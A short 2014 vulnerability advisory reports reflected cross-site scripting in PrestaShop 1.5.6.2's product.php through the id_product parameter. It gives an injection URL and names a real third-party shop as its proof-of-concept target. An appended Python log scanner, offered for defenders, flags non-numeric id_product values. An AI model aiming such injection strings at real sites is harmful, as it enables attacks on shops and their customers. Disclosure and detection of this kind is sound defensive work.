# Cross Site Scripting on E-Commerce PrestaShop
# Risk: Low
# CWE number: CWE-79
# Date: 09/04/2014
# Vendor: www.prestashop.com
# Version: PrestaShop 1.5.6.2
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 Pro
# Vulnerable File: product.php
# Exploit: http:/host//product.php%3fid_product=[xss]
# PoC:
- Target: www.serviezenenmeer.nl
- Vuln. File: product.php%3fid_product=
- Exploit: ">Vulnerable
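
For defenders, one way to spot requests of the shape reported above in web server logs. This is an added example, not part of the advisory and not PrestaShop code. It assumes a combined-style access log and that a legitimate `id_product` is always a decimal integer; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Apr/2014:10:00:01 +0000] "GET /product.php?id_product=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Apr/2014:10:00:07 +0000] "GET //product.php%3fid_product=%22%3EVulnerable HTTP/1.1" 200 5342',
    '203.0.113.9 - - [09/Apr/2014:10:00:09 +0000] "GET /product.php?id_product=7&id_product=%22%3Ex HTTP/1.1" 200 5342',
    '198.51.100.2 - - [09/Apr/2014:10:01:00 +0000] "GET /index.php?id_category=3 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id_product(line):
    """Return the decoded id_product values in one log line that are not plain integers."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Collapse leading slashes so '//product.php' is not parsed as a host name.
    target = '/' + m.group(1).lstrip('/')
    # The advisory's URL carries the '?' percent-encoded (%3f); treat that
    # form as the query delimiter when no literal '?' is present.
    if '?' not in target:
        target = re.sub('%3f', '?', target, count=1, flags=re.I)
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/product.php'):
        return []
    # parse_qs percent-decodes values and keeps repeated parameters.
    values = parse_qs(parts.query, keep_blank_values=True).get('id_product', [])
    return [v for v in values if not re.fullmatch(r'[0-9]+', v)]

def scan(lines):
    """Return (line_number, offending_values) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        bad = suspicious_id_product(line)
        if bad:
            hits.append((number, bad))
    return hits

if __name__ == '__main__':
    for number, bad in scan(SAMPLE_LOG):
        print(f'line {number}: non-numeric id_product {bad!r}')
```

The same integer-only rule is the natural server-side fix: reject or cast `id_product` before it reaches any template, and HTML-escape it wherever it is echoed.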